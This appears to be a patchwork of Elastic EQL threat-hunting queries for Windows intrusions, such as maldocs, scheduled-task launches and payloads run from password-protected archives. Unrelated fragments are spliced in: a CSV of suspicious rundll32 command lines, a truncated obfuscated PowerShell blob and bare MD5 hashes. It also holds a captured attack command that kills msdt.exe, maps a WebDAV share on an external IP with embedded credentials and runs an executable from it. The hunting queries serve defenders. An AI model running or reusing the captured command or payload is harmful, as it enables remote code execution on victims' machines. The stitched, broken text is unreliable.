
/* Hunt: a Windows service or scheduled task launching a freshly written binary.
   The parent is either services.exe (service start) or the svchost.exe instance
   whose arguments include "schedule" (the Task Scheduler service host), and the
   image file was created or renamed less than 300 before the process started
   (the relative_* fields are documented as seconds by Elastic Defend — confirm
   for your endpoint version).
   Legitimate installers and updaters that register services or tasks will also
   match; tune with a process.executable or code-signature allow-list rather
   than by loosening the parent conditions. */
process where event.action == "start" and
(
/* `:` is a case-insensitive match in EQL, so svchost.exe / SVCHOST.EXE both hit */
(process.parent.name : "svchost.exe" and process.parent.args : "schedule") or
process.parent.name : "services.exe"
)
and
/* the executed image was written or renamed just before it ran */
(process.Ext.relative_file_creation_time < 300 or process.Ext.relative_file_name_modify_time < 300)
"Top 1000 values of process.executable","Top 1000 values of process.command_line","Top 1000 values of process.working_directory","Count of records"
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Program Files (x86)""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Windows""","C:\Users\user\Desktop\",8
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""ProgramData""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Recovery""","C:\Users\user\Desktop\",7
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Documents and Settings""","C:\Users\user\Desktop\",11
"C:\Windows\System32\rundll32.exe
$iWli=('011K110,01110101,01101110,011K011,011101K,01101K1,01101111,01101110,K1KK0,011101K,01K1101,01KK11,011K110,01101011,0101K11,01K01K,K1KK0,01111011,KK1101,KK1010,KK1101,KK1010,KK1K1,01011011,01KK11,01101101,011K1K,011011K,011K101,011101K,01KK10,01101K1,01101110,011K1K,01101K1,01101110,011K111,K101K0,K101K1,01011101,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,0101KK,011KK1,0111K10,011KK1,01101101,K1KK0,K101K0,01011011,011K010,01111K1,011101K,011K101,01011011,01011101,01011101,K1KK0,K1K1K,011K010,01111K1,011101K,011K101,01KK01,0111K10,0111K10,011KK1,01111K1,K101K1,KK1101,KK1010,K1KK0,KK1101,KK1010,KK1K1,0101KK,0111K10,01101111,011K011,011K101,0111K11,0111K11,K1KK0,01111011,KK1101,KK1010,KK1K1,K1KK0,K1KK0,K1KK0,K1KK0,K1K1K,011K111,01101011,011K1K,011K110,K111101,K101K0,K1K111,K101K0,01011011,01K1K1,01K1111,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,01K1101,0110111
/* Hunt: maldoc smuggled as Word XML or MHTML content under a doc* extension.
   Within one minute, an Office process handles a file whose extension starts
   with "doc" (doc, docx, docm, ...) and whose header bytes decode to
   "<?xml version" (3c3f786d6c2076657273696f6e) or "MIME-Version:"
   (4d494d452d56657273696f6e3a), and the same Office process then starts a
   child. Both steps are keyed on the Office process: entity_id on the file
   event, parent.entity_id on the child process event. */
sequence with maxspan=1m
[file where event.action != "deletion" and
file.extension : "doc*" and
/* xml or mht file header renamed as doc smuggling maldoc */
file.Ext.header_bytes : ("3c3f786d6c2076657273696f6e*", "4d494d452d56657273696f6e3a*") and
process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE")] by process.entity_id
/* any child spawned by the Office process that touched the file above */
[process where event.action == "start" and
process.parent.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE")] by process.parent.entity_id
/* Hunt: Word fetches a remote HTTPS resource, caches an HTML file, then spawns
   a child — all within 30 seconds.
   Step 1: winword.exe writes an Office "Internet\Server Cache" registry key
           whose name begins with https (the remote server it contacted).
   Step 2: the same process creates an htm* file of at least 4096 bytes under
           the user's Content.MSO cache folder.
   Step 3: a child of winword.exe starts, excluding children that are commonly
           benign (splwow64 print-driver host, DW/WER error reporting).
   Steps 1 and 2 are joined on winword's entity_id, step 3 on parent.entity_id.
   The 4096-byte floor filters tiny or empty cache entries; adjust it against
   your own data if real payloads fall below it. */
sequence with maxspan=30s
[registry where process.name : "winword.exe" and
registry.path : "HKEY_USERS\\*\\Software\\Microsoft\\Office\\*\\Common\\Internet\\Server Cache\\https*"] by process.entity_id
[file where event.action == "creation" and
file.path : "?:\\Users\\*\\AppData\\*\\Content.MSO\\*" and process.name : "winword.exe" and
file.extension : "htm*" and file.size >= 4096] by process.entity_id
/* child process of Word, minus the usual benign helpers */
[process where event.action == "start" and process.parent.name : "winword.exe" and
not process.name : ("splwow64.exe", "DWWIN.EXE", "WerFault.exe")] by process.parent.entity_id
# Captured command sequence, kept verbatim as evidence (do not reformat):
#   1. a hidden cmd.exe forcibly ends msdt.exe;
#   2. a second hidden cmd.exe maps drive Z: to a WebDAV share on 5.206.224.233
#      with a username and password embedded in the command line (the backtick
#      escapes `$` so the password is passed literally), runs z:\osdupdate.exe,
#      then removes the mapping.
# The line break inside the second -ArgumentList string may be an artifact of
# how this snippet was captured — it sits inside the string literal.
# Detection pivots: cmd.exe started from a PowerShell host with
# -windowstyle hidden; `net use` to an external IP address (webdav share);
# an executable launched from a freshly mapped drive letter; WebClient
# (WebDAV) network activity to the IP above.
$cmd="C:\windows\system32\cmd.exe";
# kill msdt.exe
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
# map remote WebDAV share, execute from it, unmap
Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224.233\webdav\ /user:user
`$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";
/* Hunt: an Office application launching a native Windows binary with a
   directory-traversal style command line.
   This query keys on event.type ("start" in ECS, "process_started" in older
   data) rather than the event.action field used by the other queries on this
   page — check which one your integration populates before relying on it.
   Only command lines containing four or more ../ (or ..\ / ..//) hops match;
   shorter chains will not, so widen the patterns below if your data shows them. */
process where event.type in ("start", "process_started") and
process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe") and
/* add further directory-traversal patterns here as needed */
process.command_line : ("*../../../..*", "*..\\..\\..\\..*", "*..//..//..//..*") and
/* restrict to binaries under System32 / SysWOW64; `:` is case-insensitive, so the mixed case here is harmless */
process.executable : ("?:\\windows\\system32\\*.exe", "?:\\Windows\\SysWOW64\\*.exe")
76f7247dcb2f7dfb50a21eb9fe35a55a
fea98f3eb09ddfc5686d45c91ed887fd
d3b8822c5107aaeb1704dcdea673eeb0
d4d738c7d917261c6b504de932fc36ec
d0ee5895a471bdeafcb5a1d759ff3879
759e2d7e3820770f2ed1e95f4207242f
e641c2fb4b71b12e4f7abae53d89a5a8
9bf5a424d33fc007310d18255e053986
e3ca32ebe9b538cd74bafeb6aa0440f5
2ce0a4bc8db0f54d6b0b8d681f42bb5b
/* Hunt: a file executed out of a password-protected archive opened in the
   7-Zip GUI or WinRAR. Within one minute on the same host:
   1. a 7zG.exe / WinRAR.exe process whose arguments do not include the
      archive-creation command "a" (i.e. it is opening or extracting, not packing);
   2. that process writes the ShowPassword registry value with data "0" —
      observed when the archive-password prompt is displayed (confirm the
      exact key path against your own telemetry);
   3. a child of that archiver process starts.
   Steps are joined on process.pid / parent.pid. The other sequences on this
   page join on entity_id, which is not affected by PID reuse — prefer it here
   too if the field is available in your registry events. */
sequence by host.id with maxspan=1m
[process where process.name : ("7zG.exe", "WinRAR.exe") and not process.args : "a"] by process.pid
[registry where process.name : ("7zG.exe", "WinRAR.exe") and registry.value : "ShowPassword" and registry.data.strings : "0"] by process.pid
[process where event.action == "start" and process.parent.name : ("7zG.exe", "WinRAR.exe")] by process.parent.pid
/* Hunt: a payload run from a password-protected zip opened through Windows
   Explorer. Within one minute on the same host:
   1. Windows Security event 5379 (Credential Manager credentials were read)
      whose target is the Explorer ZipFolder credential
      (Microsoft_Windows_Shell_ZipFolder*) — requires the Security log to be
      shipped, since the winlog.* fields come from it;
   2. explorer.exe launches an executable from a Temp?_* folder under the
      user's %LOCALAPPDATA%\Temp (the Temp1_<archive> pattern Explorer uses
      when a file is opened from inside a zip — confirm on your endpoints).
   The two steps share only host.id, so step 2 may pair with an unrelated 5379
   from another session; add user.id (or an equivalent field) to the `by`
   clause if both event sources populate it. */
sequence by host.id with maxspan=1m
[any where event.code : "5379" and winlog.event_data.TargetName : "Microsoft_Windows_Shell_ZipFolder*"]
/* executable staged by Explorer from the archive, started by explorer.exe */
[process where event.action == "start" and process.executable : "?:\\Users\\*\\Appdata\\Local\\Temp\\Temp?_*" and process.parent.name : "explorer.exe"]